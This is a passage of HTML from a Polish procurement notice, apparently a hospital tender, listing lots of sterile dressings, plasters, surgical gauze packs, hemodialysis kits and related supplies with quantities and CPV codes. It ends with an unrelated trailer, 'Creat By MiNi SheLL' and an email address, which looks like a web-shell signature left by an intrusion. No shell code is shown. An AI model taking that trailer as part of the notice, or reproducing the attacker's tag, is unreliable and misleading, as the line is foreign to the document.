<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Opatrunki pooperacyjne jałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przylepiec hipoalergiczny pooperacyjny włókninowy jałowy  5 cm x 7,2		szt	7000
Przylepiec hipoalergiczny pooperacyjny włókninowy jałowy  6 cm x 10 cm		szt	6100
Przylepiec hipoalergiczny pooperacyjny włókninowy jałowy  8 cm x 10 cm		szt	7000
Przylepiec hipoalergiczny pooperacyjny włókninowy jałowy  8 cm x 15 cm		szt	6000
Przylepiec hipoalergiczny pooperacyjny włókninowy jałowy  8 cm x 20 cm		szt	3500
Przylepiec hipoalergiczny pooperacyjny włókninowy jałowy  10 cm x 20 cm		szt	4000
Przylepiec hipoalergiczny pooperacyjny włókninowy jałowy  25 cm x 10 cm		szt	4000
Przylepiec hipoalergiczny pooperacyjny włókninowy jałowy  35 cm x 10 cm		szt	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.11-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Plastry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Plaster na włókninie hypoalergiczny, perforowany na całej powierzchni, wodoodporny z klejem akrylowym szer 5 cm długość 9,1 -9,2 m		szt	1300
Plaster na włókninie hypoalergiczny, perforowany na całej powierzchni, wodoodporny z klejem akrylowym szer 2,5 cm długość 9,1 -9,2 m		szt	3500
Plaster na tkaninie bawełnianej z klejem akrylowym szer 5 cm długość 9,1 -9,2 m		szt	800
Plaster na tkaninie bawełnianej z klejem akrylowym szer 2,5 cm długość 9,1 -9,2 m		szt	2000
Plaster przezroczysty perforowany na folii hypoalergiczny szer.2,5 cm długość 5 m		szt	500
Plaster na elastycznej tkaninie lub włókninie, hypoalergiczny, rozciągliwy z papierem wyścielającym 20 cm x 10 m		szt	200
Plaster z opatrunkiem na tkaninie lub włókninie szer. 6 cm		mb	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Opatrunki do mocowania wkłuć.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunek  do mocowania wkłuć obwodowych z wcięciem, ramką i metką w rozmiarze 5,8 do 7cm x 7 do 9 cm		szt	30000
Opatrunek foliowy, przezroczysty, sterylny do mocowania wkłuć  z  ramką 10cm x 12 cm		szt	1500
Opatrunek foliowy, przezroczysty, sterylny do mocowania wkłuć obwodowych z wcięciem, ramką i metką 5cm x 5,7 cm		szt	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.11-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Opatrunki śródoperacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jałowy pakiet zabiegowy do artroskopii:  20szt  kompresy gazowe 17N 16W RTG 7,5x7,5cm przewiązane po 10szt, 1szt  opaska dziana 4x15 cm, 1szt opaska elastyczna 15cmx5m, zapakowany w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta. Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		op	350
Jałowy pakiet zabiegowy do laparotomii :  30szt  kompresy gazowe 17N 16W RTG 10x10 cm,   przewiązane po 10szt , 30szt tupfery kule  17N  20x20cm z RTG, 2szt  serweta operacyjna 17N 4W z nitką rtg + tasiemka 45x70cm, 1szt kompres gazowy  17N 16W,Roz.10x30cm, zapakowany w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		op	300
Jałowy pakiet zabiegowy do protezy kolana, 30szt kompresy gazowe17N 16W z RTG ,roz.10x10cm przewiązane po 10szt, 4szt serweta gazowa 17N 6W z  nitka RTG +tasiemka,Roz.45x45cm, 1szt opaska dziana 4x15cm, 1szt opaska elastyczna 15cmx5m, zapakowany w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		op 	100
Jałowy seton z podwijanymi brzegami ,roz.3mx5cm		szt	300
Jałowy kompres gazowy  17N 16W  roz.30x10cm a 1szt. Zapakowany w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta. Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		szt	600
Jałowe  kompresy gazowe 17N  24W z RTG,Roz.10x20cm a 5szt Zapakowane w opakowanie typu miękki blister.		op	400
Jałowa opaska elastyczna  15cmx5m a 1szt. Zapakowana w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.		szt	400
Jałowa opaska dziana 15cmx4m a 1szt. Zapakowana w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.		szt	500
jałowe oznaczniki chirurgiczne(kolor czerwony,niebieski,żółty,biały)o szer.2mm dł 900mm, a 10szt		op	5
jałowe oznaczniki chirurgiczne(kolor czerwony,niebieski,żółty,biały)o szer.3mm dł 900mm, a 10szt		op	5
jałowe oznaczniki chirurgiczne(kolor czerwony, niebieski, żółty, biały)o szer.4mm dł 900mm, a 10szt		op	20
jałowe tupfery kule  17N z RTG 20x20cm a 10szt zapakowane w opakowanie typu miękki blister		op	500
jałowe tupfery kule  17N z RTG 20x20cm a 20szt zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta. Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		op	1000
Jałowe kompresy gazowe 16W z RTG,Roz.10x10cm a 10szt. Zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta. Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		op	1000
Jałowe kompresy gazowe 16W z RTG,Roz.10x10cm a 20szt. Zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta. Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		op	2000
Jałowe kompresy gazowe 16W z RTG,Roz.10x10cm a 30szt. Zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta. Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		op	500
Jałowe kompresy gazowe 16W z RTG,Roz.10x10cm a 50szt. Zapakowane  w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 .Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta. Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		op	500
Opatrunek włókninowy, mikroporowaty, elastyczny, jałowy, owalny, z centralnie  umieszczonym  wkładem  chłonnym  powleczonym  siateczką zapobiegającą przywieraniu do rany, klej akrylowy, 6,5cmx 9,5cm x50 szt.		op	1
Jałowe kompresy włókninowe z nacięciem, Y ,Roz.5x5cm,4W,40g/m2 zapakowane w opakowanie typu miękki blister, a 2szt. Sterylizowane w parze wodnej.		op	10
Jałowe kompresy włókninowe z nacięciem, Y ,Roz.10x10cm,4W,40g/m2 zapakowane w opakowanie typu miękki blister, a2szt. Sterylizowane w parze wodnej.		op	10
Jałowe serwety gazowe 17N 4W z RTG +tasiemka ,Roz.45x70cm a 1szt . Zapakowane  w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 .Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta. Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		szt	500
jałowe tupfery kule  17N z 20x20cm a 30szt zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta. Materiał gazowy  kl 2a Reg 7,sterylizowany w parze wodnej.		op	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.16-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zestawy do hemodializ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw sterylny do hemodializy (podłączenie/rozłączenie) Podłączenie: serweta 45x45cm;  para rękawic latex pudrowane rozm. M lub S; 4kompresy z gazy 7,5x7,5cm; opatrunek samoprzylepny transparentny 6x7cm - 2 szt; podwójne przylepce z włókniny. Rozłączenie - para rękawic latex pudrowanych rozm. M lub S, rękawiczka diagnostyczna winylowa, pudrowa rozm L, 4 kompresy z gazy 7,5x7,5cm, opatrunek samoprzylepny 7x5cm w ilości 2 szt.		kpl	9000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Ewakuator laparoskopowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ewakuator laparoskopowy ,poj 200 ml, kompatybilny z urządzeniem do elektrochirurgii VIO		szt	150
Ewakuator laparoskopowy, poj. 410 ml, kompatybilny z urządzeniem do elektrochirurgii VIO		szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zestawy transradialne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawy wprowadzające transradialne - Introducer do nakłucia tetnicy promieniowej		szt	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.62.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com